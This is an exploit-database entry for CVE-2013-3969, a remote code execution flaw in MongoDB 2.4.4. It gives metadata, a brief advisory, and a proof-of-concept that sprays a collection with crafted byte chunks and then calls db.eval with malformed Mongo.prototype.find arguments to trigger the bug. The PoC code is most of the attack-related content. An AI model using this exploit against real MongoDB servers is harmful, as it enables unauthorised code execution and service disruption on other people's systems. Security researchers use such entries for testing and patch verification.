MongoDB - 'conn' Mongo Object Remote Code Execution
Author: SCRT Security
type: remote
platform: multiple
port:
date_added: 2013-06-04
date_updated: 2015-11-10
verified: 1
codes: CVE-2013-3969;OSVDB-98102
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/61309/info
MongoDB is prone to a remote code execution vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to execute arbitrary code within the context of the affected application.
MongoDB 2.4.4 is vulnerable; other versions may also be affected.
use databaseMapped
sizechunk=0x1338; chunk=""; for(i=0;i<sizechunk;i++){ chunk+="\x05\x7c\x77\x55\x08\x04\x00\x00"; } for(i=0;i<30000;i++){ db.my_collection.insert({my_chunk:chunk}) }
db.eval('Mongo.prototype.find("a",{"b":"c"},"d","e","f","g","h")');